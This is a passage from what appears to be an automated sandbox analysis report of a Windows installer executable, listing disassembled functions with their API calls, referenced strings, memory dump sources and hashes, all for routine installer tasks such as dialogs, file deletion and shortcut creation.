                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FilePointer
                                                                                                      • String ID:
                                                                                                      • API String ID: 973152223-0
                                                                                                      • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                      • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                      • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                      • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                      Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 3850602802-0
                                                                                                      • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                      • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                      • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                      • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                      Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 2492992576-0
                                                                                                      • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                      • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                      • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                      • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

                                                                                                      Non-executed Functions

                                                                                                      Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                      • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                      • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                      • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                      • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                      • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                      • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                      • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                      • String ID: $ @$M$N
                                                                                                      • API String ID: 1638840714-3479655940
                                                                                                      • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                      • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                      • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                      • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                      Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                      • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                      • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                      • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                      • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                      • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                      • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                      Strings
                                                                                                      • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                      • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                      • ptF, xrefs: 00406D1A
                                                                                                      • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                      • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                      • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                      • \*.*, xrefs: 00406D2F
                                                                                                      • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                      • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                      • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                      • API String ID: 2035342205-1650287579
                                                                                                      • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                      • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                      • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                      • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                      Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                      • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                      • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                      • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                      • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                      • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                      • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                      • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                        • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                        • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                        • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                      • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                        • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427979,759223A0,00000000), ref: 00406902
                                                                                                      • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                      • String ID: F$A
                                                                                                      • API String ID: 3347642858-1281894373
                                                                                                      • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                      • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                      • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                      • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                      Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                      • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                      • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                      • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                      • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                      • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                      • API String ID: 1916479912-1189179171
                                                                                                      • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                      • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                      • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                      • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                      Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427979,759223A0,00000000), ref: 00406902
                                                                                                      • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                      • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                      • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                      • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00427979,759223A0,00000000), ref: 00406A73
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                      • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                      • API String ID: 3581403547-1792361021
                                                                                                      • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                      • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                      • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                      • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                      Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                      Strings
                                                                                                      • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateInstance
                                                                                                      • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                      • API String ID: 542301482-1377821865
                                                                                                      • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                      • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                      • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                      • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                      Function 004079A2 Relevance: .3, Instructions: 347COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                      • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                      • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                      • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                      Function 0040737E Relevance: .3, Instructions: 303COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
